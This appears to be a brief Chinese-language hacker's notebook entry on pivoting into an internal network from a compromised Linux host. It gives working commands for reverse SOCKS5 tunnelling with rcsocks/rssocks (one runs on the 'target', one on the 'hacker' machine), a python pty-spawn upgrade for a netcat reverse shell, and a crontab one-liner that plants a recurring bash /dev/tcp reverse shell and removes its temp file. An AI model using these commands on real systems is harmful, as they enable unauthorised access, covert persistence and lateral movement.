emmm。有了一台 linux 计划任务反弹的shell,socks 搞内网 ~
使用方法 就跟 rcsocks 的 help 一样, rsscoks 在target上运行,rcsocks 在 hacker 上运行 // 我用 use 标出来了
[root@target src]# ./rcsocks -h
./rcsocks -h
rcSocks Reverse Client Socks5 v0.0.14
Usage:
./rcsocks -p 1088 -l 1080 -b // use
./rcsocks -p 1088 -l 1080
In this config you run rssocks like this:
rssocks --socks rcsocksserv:1080 // use
and set your tool to connect trought the [socks5 server rcsocksserv:1088] // use
对于 ssocksd 使用场景,我觉得是,直接外部可访问有独立IP,直接开个端口就OK,没实际测试
./src/ssocksd -b 127.0.0.1 --port 1080
./src/ssocksd -b 127.0.0.1 --port 1080 --daemon &
python -c 'import pty;pty.spawn("/bin/sh")'
问了下师傅,nc 反弹过来的 转成 pty 能交互很爽
echo "*/5 * * * * bash -i >& /dev/tcp/127.0.0.1/6666 0>&1" > conf && crontab conf && rm -f conf
一行写成 计划任务
Linux的需要先进行编译:./configure make